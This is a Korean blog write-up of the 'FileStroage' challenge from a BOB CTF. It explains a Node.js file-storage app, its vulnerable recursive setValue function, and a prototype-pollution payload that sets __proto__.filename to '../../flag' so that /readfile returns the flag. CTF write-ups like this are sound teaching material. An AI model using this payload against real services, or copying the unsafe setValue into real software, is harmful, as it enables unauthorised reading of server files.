[BOB CTF 8th] - FileStroage

글 작성자: heogi

0. Description

파일을 관리할 수 있는 구현이 덜 된 홈페이지입니다.

1. 페이지 구성


        
        
        
        COPY
      
1. GET /
read객체의 filename property에 fake라는 스트링을 넣고 반환
 
2. POST /mkfile
파일 생성 기능, filename과 content를 입력받아 __dirname/storage/ 경로에 filename 값을 해쉬하여
해쉬 이름으로 파일을 생성한 파일 이름을 반환한다.
 
3. GET /readfile
filename 파라미터를 받을 경우 __dirname/storage/ 경로에서 filename 이름의 파일을 읽는다.
filename 파라미터가 없을 경우 read 오브젝트의 filename Property를 가져온다.
 
4. GET /test
func, filename, rename 파라미터를 받는다.
func가 rename일 경우 SetValue 함수를 통해 file 객체 property를 설정한다.
func가 reset일 경우 read 객체를 초기화한다.

2. 분석

먼저 flag의 위치는 dockerfile에 /flag로 확인된다.

아래 /readfile 에서 filename을 통해 path traversal 공격을 시도해 볼 수 있지만, "."이 모두 필터링되어 효과는 없다.


        
        
        
        COPY
      
app.get('/readfile',function(req,resp){
	let filename=file[req.query.filename];
	if(filename==null){
		fs.readFile(__dirname+'/storage/'+read['filename'],'UTF-8',function(err,data){
			resp.send(data);
		})
	}else{
		read[filename]=filename.replaceAll('.','');
		fs.readFile(__dirname+'/storage/'+read[filename],'UTF-8',function(err,data){
        .
        .
        .
})

/readfile 에서 filename 파라미터가 없으면 read object의 filename property 값을 읽도록 되어있다.

prototype pollution을 이용하면 객체의 propety를 변조할 수 있다.

3. 취약점 파악 - SetValue func

취약점의 원인이 되는 함수이다.

JavaScript의 Prototype Pollution이 발생하는 함수로, 객체의 속성을 설정하며 다른 객체의 property 영향을 줄 수 있다.

Prototype Pollution에 대해서는 아래 게시글을 참고하자
https://blog.coderifleman.com/2019/07/19/prototype-pollution-attacks-in-nodejs/


        
        
        
        COPY
      
function isObject(obj) {
  return obj !== null && typeof obj === 'object';
}
 
function setValue(obj, key, value) { 
  const keylist = key.split('.');    
  const e = keylist.shift();         
  if (keylist.length > 0) {          
    if (!isObject(obj[e])) obj[e] = {};
    setValue(obj[e], keylist.join('.'), value);
  } else {
    obj[key] = value;
    return obj;
  }
}

4. 취약점 트리거

setValue 함수는 /test?func=rename을 통해 호출된다.

setValue(rename, "__proto__.filename", "../../flag")으로 수행되면 아래 처럼 file 객체의 [__proto__]['filename'] property가 부여되고 이는 read 객체에도 영향을 끼친다.

아래는 setValue 함수를 위의 인자로 실행했을 경우이다.


        
        
        
        COPY
      
function isObject(obj) {
  return obj !== null && typeof obj === 'object'; //if __proto__ = false & false return false
}
// 1st
function setValue(obj, key, value) { // obj is file = {} , key = __proto__.filename, value = ../../flag
  const keylist = key.split('.');    // keylist = ["__proto__", "filename"]
  const e = keylist.shift();         // keylist will be ["filename"]
  if (keylist.length > 0) {          // True
    if (!isObject(obj[e])) obj[e] = {}; // isObject return false so if is true -- obj[__proto__] = {}
    setValue(obj[e], keylist.join('.'), value);  // obj[e] is obj[__proto__], filename, ../../flag == try again setValue function
  } else {
    obj[key] = value;
    return obj;
  }
}
// 2nd 
function setValue(obj, key, value) { // obj is obj[__proto__] , key = filename, value = ../../flag
	const keylist = key.split('.');    // keylist = ["filename"]
	const e = keylist.shift();         // e = filename
	if (keylist.length > 0) {          // True
	  if (!isObject(obj[e])) obj[e] = {}; // isObject return false so if is true -- obj[__proto__][filename] = {}
	  setValue(obj[e], keylist.join('.'), value);  // obj[e] is obj[__proto__][filename], NULL , ../../flag == try again setValue function
	} else {
	  obj[key] = value;
	  return obj;
	}
  }
 
// 3rd 
function setValue(obj, key, value) { // obj is obj[__proto__][filename] , key = NULL, value = ../../flag
	const keylist = key.split('.');    // keylist = NULL
	const e = keylist.shift();         // e = NULL
	if (keylist.length > 0) {          // FALSE
	  if (!isObject(obj[e])) obj[e] = {}; // Not Execute
	  setValue(obj[e], keylist.join('.'), value);  // Not Execute
	} else {
	  obj[key] = value;                // file[__proto__][filename] = "../../flag"
	  return obj;                      // return file[__proto__][filename] = "../../flag"
	}
  }

setValue를 통해 read 객체의 filename property가 변조되면, /readfile 경로로 요청을 보내 read[filename]의 파일을 가져온다.


        
        
        
        COPY
      
** payload **
 
GET /test?func=rename&filename=__proto__.filename&rename=../../flag
 
GET /readfile
 
FLAG - BISC{bob11_bisc_h4c_PR0T0LF1!!!!@#}

'🛡️CTF > DreamHack' 카테고리의 다른 글

rev-basic-4 (0)	2023.09.28
rev-basic-3 (0)	2023.09.19
[BOB CTF 8th] - Summer Fan (0)	2022.09.13
Apache htaccess (0)	2022.07.28
read_flag (0)	2022.01.23

내 블로그 - 관리자 홈 전환	`Q` `Q`
새 글 쓰기	`W` `W`

글 수정 (권한 있는 경우)	`E` `E`
댓글 영역으로 이동	`C` `C`

이 페이지의 URL 복사	`S` `S`
맨 위로 이동	`T` `T`
티스토리 홈 이동	`H` `H`
단축키 안내	`Shift` + `/` `⇧` + `/`

[BOB CTF 8th] - FileStroage

0. Description

1. 페이지 구성

2. 분석

3. 취약점 파악 - SetValue func

4. 취약점 트리거

'🛡️CTF > DreamHack' 카테고리의 다른 글

댓글

이 글 공유하기

티스토리툴바

개인정보

티스토리툴바

개인정보

단축키

내 블로그

블로그 게시글

모든 영역

0. Description

1. 페이지 구성

2. 분석

3. 취약점 파악 - SetValue func

4. 취약점 트리거

'🛡️CTF > DreamHack' 카테고리의 다른 글

댓글

이 글 공유하기

다른 글

rev-basic-4

rev-basic-3

[BOB CTF 8th] - Summer Fan

Apache htaccess

티스토리툴바

개인정보

티스토리툴바

개인정보

단축키

내 블로그

블로그 게시글

모든 영역